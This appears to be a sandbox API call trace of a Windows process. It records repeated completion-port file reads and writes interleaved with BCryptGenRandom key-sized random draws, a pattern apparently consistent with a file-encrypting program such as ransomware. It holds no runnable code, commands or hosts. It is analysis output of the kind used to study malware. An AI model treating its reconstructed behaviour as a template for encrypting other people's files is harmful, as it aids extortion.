[0147.735] free (_Block=0x1fa2ed8) [0147.735] free (_Block=0x1fa90b8) [0147.735] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.742] CloseHandle (hObject=0x308) returned 1 [0147.742] free (_Block=0x3df0008) [0147.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.753] CloseHandle (hObject=0x2a8) returned 1 [0147.753] free (_Block=0x1ff1e60) [0147.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.758] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4b4a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0147.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.785] CloseHandle (hObject=0xec) returned 1 [0147.786] free (_Block=0x3e70008) [0147.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.795] CloseHandle (hObject=0x308) returned 1 [0147.795] free (_Block=0x3df0008) [0147.795] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.802] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x69d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.814] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.828] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x62e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.834] CloseHandle (hObject=0x308) returned 1 [0147.834] free (_Block=0x3df0008) [0147.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.834] CloseHandle (hObject=0xec) returned 1 [0147.835] free (_Block=0x3e70008) [0147.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.837] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.837] free (_Block=0x3e305b8) [0147.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.837] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.838] free (_Block=0x1fa91d0) [0147.838] free (_Block=0x1fa2ed8) [0147.838] free (_Block=0x1fa90b8) [0147.838] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.840] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x99b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.840] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.841] CloseHandle (hObject=0x3cc) returned 1 [0147.841] free (_Block=0x1ff1e60) [0147.841] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.850] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.850] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.851] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.851] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.851] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.851] free (_Block=0x3e305b8) [0147.851] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.851] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.852] free (_Block=0x1fa91d0) [0147.852] free (_Block=0x1fa2ed8) [0147.852] free (_Block=0x1fa90b8) [0147.852] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.853] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x50c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.865] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x650c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.867] CloseHandle (hObject=0x3cc) returned 1 [0147.867] free (_Block=0x3df0008) [0147.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.878] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.879] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.879] free (_Block=0x3e305b8) [0147.879] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.879] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.879] free (_Block=0x1fa91d0) [0147.879] free (_Block=0x1fa2ed8) [0147.879] free (_Block=0x1fa90b8) [0147.879] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.881] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.897] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5eae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.898] CloseHandle (hObject=0x3cc) returned 1 [0147.898] free (_Block=0x3df0008) [0147.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.908] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.908] free (_Block=0x3e305b8) [0147.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.908] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.909] free (_Block=0x1fa91d0) [0147.909] free (_Block=0x1fa2ed8) [0147.909] free (_Block=0x1fa90b8) [0147.909] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.910] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.912] CloseHandle (hObject=0x3cc) returned 1 [0147.912] free (_Block=0x3df0008) [0147.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.922] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.922] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.922] free (_Block=0x3e305b8) [0147.922] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.922] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.922] free (_Block=0x1fa91d0) [0147.922] free (_Block=0x1fa2ed8) [0147.922] free (_Block=0x1fa90b8) [0147.922] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.924] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8b90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.924] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.926] CloseHandle (hObject=0x3cc) returned 1 [0147.926] free (_Block=0x3df0008) [0147.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.935] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.936] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.936] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.936] free (_Block=0x3e305b8) [0147.936] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.936] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.937] free (_Block=0x1fa91d0) [0147.937] free (_Block=0x1fa2ed8) [0147.937] free (_Block=0x1fa90b8) [0147.937] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.941] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.954] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2182, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.955] CloseHandle (hObject=0x3cc) returned 1 [0147.955] free (_Block=0x3df0008) [0147.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.966] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.966] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.966] free (_Block=0x3e305b8) [0147.966] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.966] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.967] free (_Block=0x1fa91d0) [0147.967] free (_Block=0x1fa2ed8) [0147.967] free (_Block=0x1fa90b8) [0147.967] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.968] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x37f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.981] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x21da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.982] CloseHandle (hObject=0x3cc) returned 1 [0147.982] free (_Block=0x3df0008) [0147.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0148.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0148.104] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.104] free (_Block=0x3e305b8) [0148.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.104] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.105] free (_Block=0x1fa91d0) [0148.105] free (_Block=0x1fa2ed8) [0148.105] free (_Block=0x1fa90b8) [0148.105] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.138] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 